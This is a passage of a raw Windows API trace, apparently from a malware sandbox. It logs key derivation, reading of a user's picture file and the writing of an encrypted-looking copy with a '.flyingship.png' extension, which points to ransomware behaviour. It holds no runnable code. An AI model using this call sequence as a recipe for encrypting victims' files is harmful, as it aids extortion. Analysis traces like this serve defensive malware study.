lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.314] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.314] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.314] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.314] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.314] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0190.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.314] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.314] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.314] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0190.314] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.314] CryptDestroyHash (hHash=0x90af58) returned 1 [0190.315] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.315] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.315] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.315] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.315] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.315] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\x6gb.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0190.316] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.316] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0190.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0190.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0190.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0190.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0190.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0190.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0190.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0190.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0190.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0190.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0190.317] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0190.317] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0190.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0190.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0190.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0190.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0190.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0190.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0190.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0190.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0190.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0190.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0190.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0190.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0190.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0190.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0190.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0190.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0190.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0190.318] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat")) returned 0x10 [0190.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0190.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0190.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0190.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0190.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0190.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0190.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0190.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0190.320] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.flyingship.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\x6gb.flyingship.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0190.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0190.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0190.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0190.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0190.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0190.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0190.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.347] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0190.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0190.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0190.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0190.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0190.347] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0190.347] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0190.347] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0190.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0190.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0190.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0190.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0190.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0190.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0190.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0190.348] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0190.348] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xa046, lpOverlapped=0x0) returned 1 [0190.350] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0190.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0190.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0190.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa046) returned 0xbea018 [0190.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0190.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0190.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0190.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0190.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa046) returned 0xbf4068 [0190.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0190.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.352] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0190.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0190.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa046) returned 0xbea018 [0190.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0190.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0190.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0190.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.353] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0190.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0190.353] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0190.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.353] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0190.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0190.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0190.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27d8 [0190.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0190.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0190.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa046) returned 0xbea018 [0190.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28a8 [0190.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0190.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2758 [0190.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0190.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0190.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0190.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0190.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0190.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd420 [0190.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0190.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0190.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0190.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0190.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa046) returned 0xbfe0b8 [0190.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0190.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0190.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0190.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0190.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0190.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0190.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 